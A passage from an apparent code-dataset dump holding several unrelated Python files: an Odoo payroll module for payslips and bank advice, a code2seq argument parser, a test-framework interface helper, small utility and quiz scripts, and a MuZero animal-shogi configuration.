working_hours_on_day = self.pool.get('resource.calendar').working_hours_on_day(cr, uid, contract.working_hours, day_from + timedelta(days=day), context)\n if working_hours_on_day:\n #the employee had to work\n leave_type = was_on_leave(contract.employee_id.id, day_from + timedelta(days=day), context=context)\n if leave_type:\n #if he was on leave, fill the leaves dict\n if leave_type['leave_type'] in leaves:\n leaves[leave_type['leave_type']]['number_of_days'] += 1.0\n leaves[leave_type['leave_type']]['number_of_hours'] += working_hours_on_day\n else:\n leaves[leave_type['leave_type']] = {\n 'name': leave_type['leave_type'],\n 'sequence': 5,\n 'code': leave_type['leave_code'],\n 'number_of_days': 1.0,\n 'number_of_hours': working_hours_on_day,\n 'contract_id': contract.id,\n }\n else:\n #add the input vals to tmp (increment if existing)\n attendances['number_of_days'] += 1.0\n attendances['number_of_hours'] += working_hours_on_day\n # TKO: Extra condition to count also weekends\n else:\n leave_type = was_on_leave(contract.employee_id.id, day_from + timedelta(days=day), context=context)\n if leave_type:\n if leave_type['leave_type'] in leaves:\n leaves[leave_type['leave_type']]['number_of_days'] += 1.0\n leaves[leave_type['leave_type']]['number_of_hours'] += leaves[leave_type['leave_type']]['number_of_hours'] / (leaves[leave_type['leave_type']]['number_of_days'] -1)\n leaves = [value for key,value in leaves.items()]\n res += [attendances] + leaves\n return res\n \n def hr_verify_sheet(self, cr, uid, ids, context=None):\n \"\"\"\n This method inherit verify sheet from HR to compute contribution register lines \n \"\"\"\n wf_service = netsvc.LocalService(\"workflow\")\n # TKO: Compute contribution register lines\n result = super(hr_payslip, self).hr_verify_sheet(cr, uid, ids, context)\n register_line_pool = self.pool.get('hr.contribution.register.line')\n register_pool = self.pool.get('hr.contribution.register')\n for slip in self.browse(cr, uid, ids, context=context):\n for line in slip.line_ids:\n if line.salary_rule_id.register_id:\n company_contrib = register_pool.compute(cr, uid, line.salary_rule_id.register_id, slip, slip.contract_id, context)\n reg_line = {\n 'name':line.name,\n 'register_id': line.salary_rule_id.register_id.id,\n 'payslip_id' : slip.id,\n 'code':line.salary_rule_id.code,\n 'employee_id':slip.employee_id.id,\n 'emp_deduction':line.total * -1,\n 'comp_deduction':company_contrib,\n 'total':line.total + line.total\n }\n register_line_pool.create(cr, uid, reg_line)\n #wf_service.trg_validate(uid, 'hr.payslip', slip.id, 'hr_verify_sheet', cr)\n #self.write(cr,uid,ids,{'state':'verify'},context=context) \n wf_service.trg_validate(uid, 'hr.payslip', slip.id, 'hr_verify_sheet', cr)\n return result\n def compute_sheet(self, cr, uid, ids, context=None):\n slip_line_pool = self.pool.get('hr.payslip.line')\n sequence_obj = self.pool.get('ir.sequence')\n lock_dict = {}\n for payslip in self.browse(cr, uid, ids, context=context):\n number = payslip.number or sequence_obj.get(cr, uid, 'salary.slip')\n #delete old payslip lines\n old_slipline_ids = slip_line_pool.search(cr, uid, [('slip_id', '=', payslip.id)], context=context)\n# old_slipline_ids\n for old_line in slip_line_pool.browse(cr,uid,old_slipline_ids):\n if old_line.lock:\n if old_line.salary_rule_id.protect_lock:\n raise osv.except_osv(_('Error !'), _('A rubrica %s esta protegida não pode alterar este valor') % (old_line.name))\n \n lock_dict[old_line.code] = old_line.amount\n slip_line_pool.unlink(cr, uid, old_line.id, context=context)\n if payslip.contract_id:\n #set the list of contract for which the rules have to be applied\n contract_ids = [payslip.contract_id.id]\n else:\n #if we don't give the contract, then the rules to apply should be for all current contracts of the employee\n contract_ids = self.get_contract(cr, uid, payslip.employee_id, payslip.date_from, payslip.date_to, context=context)\n lines = [(0,0,line) for line in self.get_payslip_lines(cr, uid, contract_ids, payslip.id,lock_dict, context=context)]\n self.write(cr, uid, [payslip.id], {'line_ids': lines, 'number': number,}, context=context)\n return True\nclass hr_payslip_line(osv.osv):\n _name = 'hr.payslip.line'\n _inherit = 'hr.payslip.line'\n \n def _calculate_total(self, cr, uid, ids, name, args, context):\n \"\"\"\n Inherit method from HR Payroll to \n \"\"\"\n res = super(hr_payslip_line, self)._calculate_total(cr, uid, ids, name, args, context)\n for k,v in res.items():\n rule = self.browse(cr, uid, k)\n if rule and rule.code == 'DIR':\n ress, amount = modf(v)\n res[k] = amount\n return res\n \n _columns = {\n 'total': fields.function(_calculate_total, method=True, type='float', string='Total', digits_compute=dp.get_precision('Payroll'),store=True ),\n 'lock' :fields.boolean('Lock line'),\n\n }\n\nhr_payslip_line()\n\n \n#New class to compute the values of company contributions\nclass contrib_register(osv.osv):\n _name = 'hr.contribution.register'\n _inherit = 'hr.contribution.register'\n \n def _total_contrib(self, cr, uid, ids, field_names, arg, context=None):\n line_pool = self.pool.get('hr.contribution.register.line')\n\n res = {}\n for cur in self.browse(cr, uid, ids, context=context):\n current = line_pool.search(cr, uid, [('register_id','=',cur.id)], context=context)\n e_month = 0.0\n c_month = 0.0\n for i in line_pool.browse(cr, uid, current, context=context):\n e_month += i.emp_deduction\n c_month += i.comp_deduction\n res[cur.id]={\n 'monthly_total_by_emp':e_month,\n 'monthly_total_by_comp':c_month,\n }\n return res\n \n _columns = {\n 'line_ids':fields.one2many('hr.contribution.register.line', 'register_id', 'Register Line', readonly=True),\n 'monthly_total_by_emp': fields.function(_total_contrib, method=True, multi='dc', string='Total By Employee', digits=(16, 2)),\n 'monthly_total_by_comp': fields.function(_total_contrib, method=True, multi='dc', string='Total By Company', digits=(16, 2)),\n 'code':fields.char('Code', size=64, required=True, readonly=False),\n 'rule_id':fields.many2one('hr.salary.rule', 'Salary Rule', required=False),\n 'active':fields.boolean('Active', required=False),\n 'note': fields.text('Description'),\n }\n _defaults ={\n 'active': lambda *a:True,\n }\n \n def compute(self, cr, uid, register_id, slip, contract_id, context=None):\n '''\n Compute Register Lines based on salary rules\n '''\n obj_rule = self.pool.get('hr.salary.rule')\n blacklist = []\n localdict = {'result': None, 'result_qty': 1.0}\n employee = contract_id.employee_id\n tot_rule= 0.0\n localdict.update({'employee': employee, 'contract': contract_id})\n #check if the rule can be applied\n if register_id.rule_id and obj_rule.satisfy_condition(cr, uid, register_id.rule_id.id, localdict, context=context) and register_id.rule_id.id not in blacklist:\n #compute the amount of the rule\n amount, qty, rate = obj_rule.compute_rule(cr, uid, register_id.rule_id.id, localdict, context=context)\n #set/overwrite the amount computed for this rule in the localdict\n tot_rule = amount * qty * rate / 100.0\n else:\n #blacklist this rule and its children\n blacklist += [id for id, seq in self.pool.get('hr.salary.rule')._recursive_search_of_rules(cr, uid, [register_id.rule_id], context=context)]\n return tot_rule\n\n\nclass contrib_register_line(osv.osv):\n '''\n Contribution Register Line\n Allows the computation from company contribution for some taxes\n '''\n\n _name = 'hr.contribution.register.line'\n _description = 'Contribution Register Line'\n\n def _total(self, cr, uid, ids, field_names, arg, context=None):\n res={}\n for line in self.browse(cr, uid, ids, context=context):\n res[line.id] = line.emp_deduction + line.comp_deduction\n return res\n\n _columns = {\n 'name':fields.char('Name', size=256, required=True, readonly=False),\n 'register_id':fields.many2one('hr.contribution.register', 'Register', required=False),\n 'payslip_id' : fields.many2one('hr.payslip','Payslip'),\n 'code':fields.char('Code', size=64, required=False, readonly=False),\n 'employee_id':fields.many2one('hr.employee', 'Employee', required=True),\n 'date': fields.date('Date'),\n 'emp_deduction': fields.float('Employee Deduction', digits=(16, 2)),\n 'comp_deduction': fields.float('Company Deduction', digits=(16, 2)),\n 'total': fields.function(_total, method=True, store=True, string='Total', digits=(16, 2)),\n }\n _defaults = {\n 'date': lambda *a: time.strftime('%Y-%m-%d'),\n }\n\nclass hr_salary_rule(osv.osv):\n _name = \"hr.salary.rule\"\n _inherit = \"hr.salary.rule\"\n \n _columns = {\n 'register_id':fields.many2one('hr.contribution.register', 'Contribution Register', help=\"Eventual third party involved in the salary payment of the employees.\"),\n #'ss_code':fields.char('Social Security Code', size=64),\n 'hide_in_contract_report' : fields.boolean('Hide in contract Report'),\n 'protect_lock' : fields.boolean('Protect from lock')\n }\n \n _order = 'sequence'\n \nclass hr_employee_history(osv.osv):\n _name = 'hr.employee.history'\n _description = 'Employee History'\n \n _columns={\n 'employee_id': fields.many2one('hr.employee', 'Employee', on_delete='cascade', required=True),\n 'message': fields.char(\"Message\", size=128, required=True),\n 'table': fields.many2one('ir.model', 'Table', required=True),\n 'field': fields.char(\"Field\", size=64, required=True),\n 'from': fields.char(\"From\", size=64),\n 'to': fields.char(\"To\", size=64, required=True),\n 'date' : fields.datetime(\"Date\", required=True),\n 'user_id':fields.many2one('res.users', 'User', required=True),\n }\n \nhr_employee_history()\n\nclass payroll_advice(osv.osv):\n '''\n Bank Advice Note\n '''\n\n _name = 'hr.payroll.advice'\n _description = 'Bank Advice Note'\n \n def _get_banks (self, cr, uid, ids, name, args, context=None): #(self, cr, uid, ids, context=None):\n res = {}\n values = []\n \n for bank in self.pool.get('res.users').browse(cr, uid, uid,\n context=context).company_id.bank_ids:\n t1 = bank.id\n values.append(t1)\n res = values\n\n return res\n \n _columns = {\n 'register_id':fields.many2one('hr.payslip.run', 'Payslip Run', required=False),\n 'name':fields.char('Name', size=2048, required=True, readonly=False),\n 'note': fields.text('Description'),\n 'date': fields.date('Date'),\n 'compute_date': fields.date('Compute Date', required=True),\n 'state':fields.selection([\n ('draft','Draft Sheet'),\n ('confirm','Confirm Sheet'),\n ('cancel','Reject'),\n ],'State', select=True, readonly=True),\n 'number':fields.char('Number', size=64, required=False, readonly=True),\n 'line_ids':fields.one2many('hr.payroll.advice.line', 'advice_id', 'Employee Salary', required=False),\n 'chaque_nos':fields.char('Chaque Nos', size=256, required=False, readonly=False),\n 'company_id':fields.many2one('res.company', 'Company', required=False),\n 'bank_id': fields.many2one('res.partner.bank', 'Bank', help=\"Select the Bank Address from whcih the salary is going to be paid\",required=True ),\n }\n _defaults = {\n 'date': lambda *a: time.strftime('%Y-%m-%d'),\n 'state': lambda *a: 'draft',\n 'company_id': lambda self, cr, uid, context: \\\n self.pool.get('res.users').browse(cr, uid, uid,\n context=context).company_id.id,\n# 'company_banks': [1,2]\n }\n\n def confirm_sheet(self, cr, uid, ids, context=None):\n sequence_pool = self.pool.get('ir.sequence')\n self.write(cr, uid, ids, {'state':'confirm','number': sequence_pool.get(cr, uid, 'payment.advice'),}, context=context)\n return True\n\n def set_to_draft(self, cr, uid, ids, context=None):\n self.write(cr, uid, ids, {'state':'draft'}, context=context)\n return True\n\n def cancel_sheet(self, cr, uid, ids, context=None):\n self.write(cr, uid, ids, {'state':'cancel'}, context=context)\n return True\n\n\n\n def onchange_company_id(self, cr, uid, ids, company_id=False, context=None):\n res = {}\n if company_id:\n company = self.pool.get('res.company').browse(cr, uid, company_id, context=context)\n if company.partner_id.bank_ids:\n res.update({'bank': company.partner_id.bank_ids[0].bank.name})\n return {\n 'value':res\n }\n \n def compute_sheet(self, cr, uid, ids, context=None):\n emp_pool = self.pool.get('hr.employee')\n slip_pool = self.pool.get('hr.payslip')\n slip_line_pool = self.pool.get('hr.payslip.line')\n advice_line_pool = self.pool.get('hr.payroll.advice.line')\n if context is None:\n context = {}\n for line in self.browse(cr, uid, ids):\n #remove old lines\n advice_line_pool.unlink(cr, uid, [x.id for x in line.line_ids])\n #compute new lines\n compute_date_year, compute_date_month, compute_date_day = line.compute_date.split('-')\n start_date = date(int(compute_date_year), int(compute_date_month), 1)\n if compute_date_month < 12:\n end_date = date(int(compute_date_year), int(compute_date_month) + 1 , 1)\n else:\n end_date = date(int(compute_date_year) + 1, 1, 1)\n payslip_ids = slip_pool.search(cr, uid, [\n ('date_from','>=',str(start_date))\n ,('date_from','<',str(end_date))\n ], order = 'employee_id')\n payslips = slip_pool.browse(cr, uid, payslip_ids)\n for payslip in payslips:\n if not payslip.employee_id.bank_account_id.acc_number:\n raise osv.except_osv(_('Error !'), _('Please define bank account for the %s employee') % (payslip.employee_id.name))\n if payslip.employee_id.bank_account_id.bank.id == line.bank_id.bank.id:\n value_net = [x.amount for x in payslip.line_ids if\n x.slip_id.state == 'done'\n and x.salary_rule_id.category_id.code in ('NET')\n ]\n if not value_net:\n raise osv.except_osv(_('Error !'), _('Amount invalid for the %s employee. Category \"NET\" missing in payslip.') % (payslip.employee_id.name))\n vals = {\n 'advice_id': line.id,\n 'name':payslip.employee_id.bank_account_id.acc_number,\n 'employee_id':payslip.employee_id.id,\n 'amount': value_net[0],\n #'bysal': payslip.net\n #'flag': ',\n }\n advice_line_pool.create(cr, uid, vals)\n return True\n\nclass payroll_advice_line(osv.osv):\n '''\n Bank Advice Lines\n '''\n\n _name = 'hr.payroll.advice.line'\n _description = 'Bank Advice Lines'\n _columns = {\n 'advice_id':fields.many2one('hr.payroll.advice', 'Bank Advice', required=False),\n 'name':fields.char('Bank Account A/C', size=64, required=True, readonly=False),\n 'employee_id':fields.many2one('hr.employee', 'Employee', required=True),\n 'amount': fields.float('Amount', digits=(16, 2)),\n #'bysal': fields.float('By Salary', digits=(16, 4)),\n #'flag':fields.char('D/C', size=8, required=True, readonly=False),\n }\n \n def onchange_employee_id(self, cr, uid, ids, date, employee_id):\n res = {}\n if employee_id:\n employee = self.pool.get('hr.employee').browse(cr, uid, employee_id)\n if not employee.bank_account_id.acc_number:\n raise osv.except_osv(_('Error !'), _('Please define bank account for the %s employee') % (employee.name))\n else:\n res.update({'name': employee.bank_account_id.acc_number})\n return {'value': res}\n","sub_path":"tkao_hr_ao/hr_payroll_ao.py","file_name":"hr_payroll_ao.py","file_ext":"py","file_size_in_byte":41742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"227101747","text":"from argparse import ArgumentParser\n\n\ndef read_args():\n parser = ArgumentParser()\n\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-d\", \"--data\", dest=\"data_path\",\n help=\"path to preprocessed dataset\")\n group.add_argument(\"-l\", \"--load_path\", dest=\"load_path\",\n help=\"path to load model files\", metavar=\"FILE\")\n\n parser.add_argument(\"-m\", \"--model_path\", dest=\"model_path\",\n help=\"path to save and load checkpoints\", metavar=\"FILE\", required=False)\n parser.add_argument(\"-s\", \"--save_path\", dest=\"save_path\",\n help=\"path to save model files\", metavar=\"FILE\", required=False)\n\n parser.add_argument(\"-t\", \"--test\", dest=\"test_path\",\n help=\"path to test file\", metavar=\"FILE\", required=False)\n\n parser.add_argument('-p', '--predict', dest='predict', type=str, default='java',\n help='starts prediction mode, argument is \"cpp\" or \"java\" dependin on language model')\n parser.add_argument('--debug', action='store_true')\n parser.add_argument('--seed', type=int, default=239)\n return parser.parse_args()\n","sub_path":"code2seq/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"3747881","text":"from ..base import TestCase, Options\nfrom .config import ConfigInterface\nfrom .selenium import SeleniumInterface\nfrom .ssh import SSHInterface\nfrom .icontrol import IcontrolInterface, EMInterface\nfrom .rest import RestInterface\n\n\nclass InterfaceHelper(object):\n \"\"\"Adds get_selenium() helper to a TestCase.\n \n - If key is a string, then it will use it as the key to lookup in the global\n handles store, which is managed by the test package.\n \n - If key is a SeleniumInterface instance then it will open it, add it to the\n local handles store and return the opened interface.\n \n - If key is None then it will try to open a new SeleniumInterface using the\n args and kwargs provided.\n \"\"\"\n def _setup(self, name, ifcs=None):\n config = ConfigInterface().open()\n config.setdefault('_attrs', Options())\n \n if ifcs:\n del ifcs[:]\n self.ifcs = ifcs\n self._apis = {}\n self._handles = {}\n self._data = Options()\n i = pos = 0\n my_id = name\n while pos != -1:\n pos = my_id.find('.', i)\n if pos > 0:\n parent = my_id[:pos]\n load = config._attrs.get(parent)\n if load and isinstance(load, dict):\n self._handles.update(load)\n \n i = pos + 1\n \n def _teardown(self):\n for interface in self._apis.keys():\n self.pop_interface(interface)\n\n def set_data(self, key, data):\n self._data[key] = data\n\n def get_data(self, key):\n return self._data.get(key)\n\n def unset_data(self, key):\n self._data.__delitem__(key)\n\n def push_interface(self, interface, managed=False):\n if not managed:\n interface.open()\n self._apis[interface] = managed\n if isinstance(self.ifcs, list):\n self.ifcs.append(interface)\n #return interface.api\n return interface\n\n def pop_interface(self, interface):\n managed = self._apis.pop(interface)\n if isinstance(self.ifcs, list):\n self.ifcs.remove(interface)\n if not managed:\n interface.close()\n\n def get_interface(self, interface_class, key=None, *args, **kwargs):\n managed = False\n if isinstance(key, basestring):\n interface = self._handles.get(key)\n managed = True\n else:\n if isinstance(key, interface_class):\n interface = key\n elif key is None:\n interface = interface_class(*args, **kwargs)\n else:\n raise ValueError(\"key argument must be either string, \"\n \"%s or None\" % interface_class)\n\n return self.push_interface(interface, managed)\n \n def get_config(self, *args, **kwargs):\n return self.get_interface(ConfigInterface, *args, **kwargs)\n\n def get_selenium(self, key='selenium', *args, **kwargs):\n return self.get_interface(SeleniumInterface, key, *args, **kwargs)\n\n def get_ssh(self, *args, **kwargs):\n return self.get_interface(SSHInterface, *args, **kwargs)\n\n def get_icontrol(self, *args, **kwargs):\n return self.get_interface(IcontrolInterface, *args, **kwargs)\n\n def get_em(self, *args, **kwargs):\n return self.get_interface(EMInterface, *args, **kwargs)\n\n def get_rest(self, *args, **kwargs):\n return self.get_interface(RestInterface, *args, **kwargs)\n\n\nclass InterfaceTestCase(InterfaceHelper, TestCase):\n \"\"\"Updates the current test attributes with the ones set in config._attrs.\n \n In tests.setup_module():\n config._attrs['tests'] = dict(handle1=1)\n \n In tests.em.setup_module():\n config._attrs['tests.em'] = dict(handle1=2)\n \n In tests.em.ui.setup_module():\n config._attrs['tests.em.ui'] = dict(handle2=3)\n \n \n Then the test would be able to access these attrs like this:\n \n tests.em.ui.test_file.TestClass.testMe:\n def testMe(self):\n print self.handle1 # would print '2'\n print self.handle2 # would print '3'\n \"\"\"\n @classmethod\n def setup_class(cls):\n ih = InterfaceHelper()\n name = \"%s.%s\" % (cls.__module__, cls.__name__)\n ih._setup(name)\n cls.ih = ih\n\n @classmethod\n def teardown_class(cls):\n cls.ih._teardown()\n\n def setUp(self, *args, **kwargs):\n self._setup(self.id())\n \n super(TestCase, self).setUp(*args, **kwargs)\n\n def tearDown(self, *args, **kwargs):\n self._teardown()\n \n super(TestCase, self).tearDown(*args, **kwargs)\n","sub_path":"f5test/interfaces/testcase.py","file_name":"testcase.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"353979269","text":"'''\r\nsimple python script that gets best correlation from files\r\n'''\r\n\r\nimport sys\r\nimport pandas\r\nimport os\r\n\r\nfilelist = sys.argv[2:]\r\n#print(filelist)\r\nmaxval = 0\r\nmatrix = \"\"\r\nalg = \"\"\r\nfor file in filelist:\r\n [data,disease,mrna,to,prot,mat,cor] = os.path.basename(file).split('-')\r\n if mrna == prot:\r\n tab = pandas.read_csv(file, sep='\\t', header=None)\r\n meanVal = tab[1].mean()\r\n if meanVal > maxval:\r\n maxval = meanVal\r\n alg = mrna\r\n matrix = mat\r\n\r\nif sys.argv[1]=='alg':\r\n print(alg)\r\nelse:\r\n print(matrix)\r\n","sub_path":"metrics/correlations/getBestCor.py","file_name":"getBestCor.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"470728385","text":"def McNuggets(n):\n \"\"\"\n n is an int\n \n Returns True if some integer combination of 6, 9 and 20 equals n\n Otherwise returns False.\n \"\"\"\n # Your Code Here\n if n < 6:\n return False\n if n == 6 or n == 9 or n == 20 or n%20 == 0 or n%9 == 0 or n%6 == 0 or n%15 == 0 or n%26 == 0 or n%29 == 0 or n%35 == 0:\n return True\n a, b, c = 0, 0, 0\n while 6*a+9*b+20*c <= n:\n if 6*a+9*b+20*c == n:\n return True\n while 6*a+9*b+20*c <= n:\n if 6*a+9*b+20*c == n:\n return True\n while 6*a+9*b+20*c <= n:\n if 6*a+9*b+20*c == n:\n return True\n c+=1\n b +=1\n c = 0\n a += 1\n b = 0 \n if 6*a+9*b+20*c != n:\n return False\n","sub_path":"Quiz/qp7.py","file_name":"qp7.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"161893427","text":"import datetime\nimport os\nimport copy\nfrom dataclasses import dataclass, astuple\nfrom typing import Optional\n\nimport numpy\nimport torch\nfrom colorama import Back\n\n\ntry:\n from abstract_game import AbstractGame\nexcept ImportError:\n from .abstract_game import AbstractGame\n\ntry:\n from models import MuZeroResidualNetwork\nexcept ImportError:\n from ..models import MuZeroResidualNetwork\n\n\nBOARD_SIZE_X = 3\nBOARD_SIZE_Y = 4\nUNIT_KIND_NUM = 5 # Lion, Elephant, Giraph, Piyo, Chicken(Piyo Promoted)\nCAPTURABLE_KIND_NUM = 3 # Elephant, Giraph, Piyo\n\nACTION_SPACE_SIZE = (\n (BOARD_SIZE_X * BOARD_SIZE_Y + CAPTURABLE_KIND_NUM) * # FROM\n (BOARD_SIZE_X * BOARD_SIZE_Y) * # TO\n 2 # Promote\n)\n\nP1_COLOR = Back.BLUE\nP2_COLOR = Back.RED\nRESET = Back.RESET\n\n\nclass MuZeroConfig:\n def __init__(self):\n # More information is available here: https://github.com/werner-duvaud/muzero-general/wiki/Hyperparameter-Optimization\n\n self.seed = 0 # Seed for numpy, torch and the game\n # Fix the maximum number of GPUs to use. It's usually faster to use a single GPU (set it to 1) if it has enough memory. None will use every GPUs available\n self.max_num_gpus = None\n\n # Game\n # Dimensions of the game observation, must be 3D (channel, height, width). For a 1D array, please reshape it to (1, 1, length of array)\n self.observation_shape = (\n (UNIT_KIND_NUM+CAPTURABLE_KIND_NUM)*2 + 1, BOARD_SIZE_Y, BOARD_SIZE_X)\n # Fixed list of all possible actions. You should only edit the length\n self.action_space = list(range(ACTION_SPACE_SIZE))\n # List of players. You should only edit the length\n self.players = list(range(2))\n # Number of previous observations and previous actions to add to the current observation\n self.stacked_observations = 0\n\n # Evaluate\n # Turn Muzero begins to play (0: MuZero plays first, 1: MuZero plays second)\n self.muzero_player = 0\n self.opponent = \"expert\" # Hard coded agent that MuZero faces to assess his progress in multiplayer games. It doesn't influence training. None, \"random\" or \"expert\" if implemented in the Game class\n\n # Self-Play\n # Number of simultaneous threads/workers self-playing to feed the replay buffer\n self.num_workers = 5\n self.selfplay_on_gpu = False\n self.max_moves = 100 # Maximum number of moves if game is not finished before\n self.num_simulations = 80 # Number of future moves self-simulated\n self.discount = 1 # Chronological discount of the reward\n # Number of moves before dropping the temperature given by visit_softmax_temperature_fn to 0 (ie selecting the best action). If None, visit_softmax_temperature_fn is used every time\n self.temperature_threshold = None\n\n # Root prior exploration noise\n self.root_dirichlet_alpha = 0.2\n self.root_exploration_fraction = 0.25\n\n # UCB formula\n self.pb_c_base = 19652\n self.pb_c_init = 1.25\n\n # Network\n self.network = \"animal_shogi\" # \"resnet\" / \"fullyconnected\"\n # Value and reward are scaled (with almost sqrt) and encoded on a vector with a range of -support_size to support_size. Choose it so that support_size <= sqrt(max(abs(discounted reward)))\n self.support_size = 1\n\n # Residual Network and animal_shogi Network\n # Downsample observations before representation network, False / \"CNN\" (lighter) / \"resnet\" (See paper appendix Network Architecture)\n self.downsample = False\n self.blocks = 3 # Number of blocks in the ResNet\n self.channels = 64 # Number of channels in the ResNet\n self.reduced_channels_reward = 16 # Number of channels in reward head\n self.reduced_channels_value = 16 # Number of channels in value head\n self.reduced_channels_policy = 32 # Number of channels in policy head\n # Define the hidden layers in the reward head of the dynamic network\n self.resnet_fc_reward_layers = [8]\n # Define the hidden layers in the value head of the prediction network\n self.resnet_fc_value_layers = [8]\n # Define the hidden layers in the policy head of the prediction network\n self.resnet_fc_policy_layers = [64]\n\n # Fully Connected Network\n self.encoding_size = 32\n # Define the hidden layers in the representation network\n self.fc_representation_layers = []\n # Define the hidden layers in the dynamics network\n self.fc_dynamics_layers = [16]\n # Define the hidden layers in the reward network\n self.fc_reward_layers = [16]\n self.fc_value_layers = [] # Define the hidden layers in the value network\n self.fc_policy_layers = [] # Define the hidden layers in the policy network\n\n # Training\n self.results_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../results\", os.path.basename(__file__)[\n :-3], datetime.datetime.now().strftime(\"%Y-%m-%d--%H-%M-%S\")) # Path to store the model weights and TensorBoard logs\n self.save_model = True # Save the checkpoint in results_path as model.checkpoint\n # Total number of training steps (ie weights update according to a batch)\n self.training_steps = 2000000\n self.batch_size = 256 # Number of parts of games to train on at each training step\n # Number of training steps before using the model for self-playing\n self.checkpoint_interval = 10\n # Scale the value loss to avoid overfitting of the value function, paper recommends 0.25 (See paper appendix Reanalyze)\n self.value_loss_weight = 0.25\n self.train_on_gpu = torch.cuda.is_available() # Train on GPU if available\n\n self.optimizer = \"Adam\" # \"Adam\" or \"SGD\". Paper uses SGD\n self.weight_decay = 1e-5 # L2 weights regularization\n self.momentum = 0.9 # Used only if optimizer is SGD\n\n # Exponential learning rate schedule\n self.lr_init = 0.003 # Initial learning rate\n self.lr_decay_rate = 1 # Set it to 1 to use a constant learning rate\n self.lr_decay_steps = 10000\n\n # Replay Buffer\n # Number of self-play games to keep in the replay buffer\n self.replay_buffer_size = 10000\n self.num_unroll_steps = 5 # Number of game moves to keep for every batch element\n # Number of steps in the future to take into account for calculating the target value\n self.td_steps = self.max_moves\n # Prioritized Replay (See paper appendix Training), select in priority the elements in the replay buffer which are unexpected for the network\n self.PER = False\n # How much prioritization is used, 0 corresponding to the uniform case, paper suggests 1\n self.PER_alpha = 0.5\n\n # Reanalyze (See paper appendix Reanalyse)\n # Use the last model to provide a fresher, stable n-step value (See paper appendix Reanalyze)\n self.use_last_model_value = False\n self.reanalyse_on_gpu = False\n\n # Adjust the self play / training ratio to avoid over/underfitting\n self.self_play_delay = 0 # Number of seconds to wait after each played game\n self.training_delay = 0 # Number of seconds to wait after each training step\n self.ratio = None # Desired training steps per self played step ratio. Equivalent to a synchronous version, training can take much longer. Set it to None to disable it\n\n @property\n def random_move_till_n_action_in_self_play(self):\n return numpy.random.choice([0, 0, 2, 2, 2, 2, 4])\n\n def visit_softmax_temperature_fn(self, trained_steps):\n \"\"\"\n Parameter to alter the visit count distribution to ensure that the action selection becomes greedier as training progresses.\n The smaller it is, the more likely the best action (ie with the highest visit count) is chosen.\n\n Returns:\n Positive float.\n \"\"\"\n if trained_steps < self.training_steps * 0.5:\n return 1\n else:\n return 0.75\n\n def num_simulations_fn(self, training_step):\n rate = training_step / (self.training_steps * 0.2)\n n = numpy.clip(self.num_simulations * rate, 20, self.num_simulations)\n return int(n)\n\n\nclass Game(AbstractGame):\n \"\"\"\n Game wrapper.\n \"\"\"\n\n def __init__(self, seed=None):\n self.env = AnimalShogi()\n\n def step(self, action):\n \"\"\"\n Apply action to the game.\n\n Args:\n action : action of the action_space to take.\n\n Returns:\n The new observation, the reward and a boolean if the game has ended.\n \"\"\"\n observation, reward, done = self.env.step(action)\n return observation, reward, done\n\n def to_play(self):\n \"\"\"\n Return the current player.\n\n Returns:\n The current player, it should be an element of the players list in the config. \n \"\"\"\n return self.env.to_play()\n\n def legal_actions(self):\n \"\"\"\n Should return the legal actions at each turn, if it is not available, it can return\n the whole action space. At each turn, the game have to be able to handle one of returned actions.\n\n For complex game where calculating legal moves is too long, the idea is to define the legal actions\n equal to the action space but to return a negative reward if the action is illegal.\n\n Returns:\n An array of integers, subset of the action space.\n \"\"\"\n return self.env.legal_actions()\n\n def reset(self):\n \"\"\"\n Reset the game for a new game.\n\n Returns:\n Initial observation of the game.\n \"\"\"\n return self.env.reset()\n\n def render(self):\n \"\"\"\n Display the game observation.\n \"\"\"\n self.env.render()\n input(\"Press enter to take a step \")\n\n def human_to_action(self):\n \"\"\"\n For multiplayer games, ask the user for a legal action\n and return the corresponding action number.\n\n Returns:\n An integer from the action space.\n \"\"\"\n return self.env.human_to_action()\n\n def action_to_string(self, action_number):\n \"\"\"\n Convert an action number to a string representing the action.\n\n Args:\n action_number: an integer from the action space.\n\n Returns:\n String representing the action.\n \"\"\"\n return self.env.action_to_string(action_number)\n\n def expert_agent(self):\n \"\"\"\n Hard coded agent that MuZero faces to assess his progress in multiplayer games.\n It doesn't influence training\n\n Returns:\n Action as an integer to take in the current game state\n \"\"\"\n return self.env.expert_action()\n\n\n@dataclass\nclass Move:\n from_board: Optional[int] # (y*3 + x) or None\n from_stock: Optional[int] # (E=0, G=1, P=2) or None\n to_board: int # (y*3 + x)\n promotion: int # 0 or 1(promote)\n\n @classmethod\n def decode_from_action_index(cls, action: int):\n \"\"\"\n\n :param action:\n ActionSpace: combination of below\n From H*W + 3(E G P stock) (15)\n To H*W (12)\n Promote 2 (2)\n \"\"\"\n board_size = BOARD_SIZE_Y * BOARD_SIZE_X\n assert 0 <= action < (board_size+3) * board_size * 2\n promote = action % 2\n action //= 2\n to_board = action % board_size\n action //= board_size\n if action < board_size:\n from_board = action\n from_stock = None\n else:\n from_board = None\n from_stock = action - board_size # (E=0, G=1, P=2)\n return cls(from_board, from_stock, to_board, promote)\n\n def encode_to_action_index(self) -> int:\n board_size = BOARD_SIZE_Y * BOARD_SIZE_X\n if self.from_stock is None:\n action = self.from_board\n else:\n action = board_size + self.from_stock\n action *= board_size * 2\n action += self.to_board * 2\n action += self.promotion\n assert 0 <= action < (board_size+3) * board_size * 2\n return action\n\n def from_pos(self):\n assert self.from_board is not None\n return self.from_board // BOARD_SIZE_X, self.from_board % BOARD_SIZE_X\n\n def to_pos(self):\n assert self.to_board is not None\n return self.to_board // BOARD_SIZE_X, self.to_board % BOARD_SIZE_X\n\n def clone(self):\n return Move(*astuple(self))\n\n\nclass AnimalShogi:\n board = None\n stocks = None\n player = 0\n _legal_actions = None\n\n def __init__(self):\n self.init_game()\n\n def clone(self):\n obj = 